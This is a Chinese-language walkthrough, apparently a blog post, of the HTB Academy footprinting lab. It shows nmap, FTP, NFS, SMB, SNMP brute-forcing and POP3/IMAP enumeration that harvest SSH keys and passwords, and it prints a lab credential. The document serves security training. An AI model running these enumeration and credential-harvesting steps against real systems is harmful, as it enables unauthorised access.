[HTB Academy] Footprinting Lab

· Updated on 2026-06-02 · 9627 words

Footprinting Lab

Easy

先使用nmap扫出来两个ftp端口 然后文章提示有账户密码 登录两个端口,使用ls -al 找到存在的.ssh中的私钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
ftp 10.129.23.22 -P 2121

Connected to 10.129.23.22.
220 ProFTPD Server (Ceil's FTP) [10.129.23.22]
Name (10.129.23.22:root): ceil
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||4703|)
150 Opening ASCII mode data connection for file list
226 Transfer complete
ftp> ls -al
229 Entering Extended Passive Mode (|||16843|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo
226 Transfer complete
ftp> cd .ssh
250 CWD command successful
ftp> ls -al
229 Entering Extended Passive Mode (|||29207|)
150 Opening ASCII mode data connection for file list
drwx------ 2 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw-rw-r-- 1 ceil ceil 738 Nov 10 2021 authorized_keys
-rw------- 1 ceil ceil 3381 Nov 10 2021 id_rsa
-rw-r--r-- 1 ceil ceil 738 Nov 10 2021 id_rsa.pub
226 Transfer complete

使用chmod 600 id_rsa 设置好正确的权限,才可以ssh -i id_rsa ceil@<ip>

find找一下flag位置,就可以

Medium

端口探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
# Nmap 7.95 scan initiated Tue Jun  2 03:30:07 2026 as: nmap -sS -sC -sV -p- -n -Pn -oN test.txt 10.129.202.41
Nmap scan report for 10.129.202.41
Host is up (0.052s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE VERSION
111/tcp open rpcbind?
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WINMEDIUM
| Not valid before: 2026-06-01T07:17:15
|_Not valid after: 2026-12-01T07:17:15
|_ssl-date: 2026-06-02T07:31:53+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: WINMEDIUM
| NetBIOS_Domain_Name: WINMEDIUM
| NetBIOS_Computer_Name: WINMEDIUM
| DNS_Domain_Name: WINMEDIUM
| DNS_Computer_Name: WINMEDIUM
| Product_Version: 10.0.17763
|_ System_Time: 2026-06-02T07:31:45+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2026-06-02T07:31:46
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 2 03:32:24 2026 -- 1 IP address (1 host up) scanned in 137.32 seconds

111端口 NFS服务探测

枚举可以使用的NFS

1
2
3
showmount -e 10.129.202.41
Export list for 10.129.202.41:
/TechSupport (everyone)

挂载到本地

1
2
mkdir test
sudo mount -o nolock 10.219.202.41:/TechSupport ./test

找到一个唯一不是空的文件 img

从里面读取到一个账户密码 img

SMB服务枚举

使用这个凭证可以枚举SMB共享

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
smbclient -L //10.129.202.41 -U alex

Password for [WORKGROUP\alex]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
devshare Disk
IPC$ IPC Remote IPC
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.202.41 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

❯ smbclient //10.129.202.41/devshare -U alex
Password for [WORKGROUP\alex]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 11 00:12:22 2021
.. D 0 Thu Nov 11 00:12:22 2021
important.txt A 16 Thu Nov 11 00:12:55 2021
get impo
10328063 blocks of size 4096. 6101374 blocks available
smb: \> get important.txt
getting file \important.txt of size 16 as important.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit

这里进一步连接devshare获取另一个凭证 img

3389 RDP利用

可以使用前面的alex账户连接 然后桌面有一个mssql 这边sa账户连接不上 需要使用管理员身份运行才可以 然后输入找到密码就可以

img

Hard

端口服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# Nmap 7.95 scan initiated Tue Jun  2 19:59:09 2026 as: nmap -sS -sC -sV -F -n -Pn -v -oN test.txt 10.129.202.20
Nmap scan report for 10.129.202.20
Host is up (0.97s latency).
Not shown: 95 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: STLS RESP-CODES UIDL USER PIPELINING SASL(PLAIN) TOP CAPA AUTH-RESP-CODE
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
|_ssl-date: TLS randomness does not represent time
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more LITERAL+ have post-login capabilities Pre-login listed IDLE SASL-IR ENABLE ID AUTH=PLAINA0001 STARTTLS IMAP4rev1 OK LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: LITERAL+ more have capabilities post-login listed Pre-login SASL-IR ENABLE ID AUTH=PLAINA0001 IDLE IMAP4rev1 OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL(PLAIN) USER UIDL RESP-CODES TOP CAPA AUTH-RESP-CODE
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 2 20:00:13 2026 -- 1 IP address (1 host up) scanned in 64.16 seconds

可利用的信息太少了,这里对于udp端口进行进一步探测

1
2
3
4
Not shown: 998 closed udp ports (port-unreach)                                                                                                                           
PORT STATE SERVICE
68/udp open|filtered dhcpc
161/udp open snmp

snmp服务枚举

默认的public跑不了 先用onesixtyone爆破出社区字符串

img

然后snmpwalk批量跑出结果 img

枚举出来的感觉有用的就这两个信息,其中一个凭证感觉可以登录进入pop或者imap

1
2
Admin <tech@inlanefreight.htb>
tom NMds732Js2761

POP3服务枚举

1
❯ openssl s_client -connect 10.129.202.20:pop3s

这里通过邮件获取到私钥 img

IMAP服务枚举

imap也可以获取私钥

这边在INBOX中发现一封邮件

img

get flag

然后私钥设置权限chmod 600 id_rsa, 进行连接服务器

直接history命令发现有mysql

使用tom的凭证连接进去,有一个user数据库 最后拿到HTB的密码

img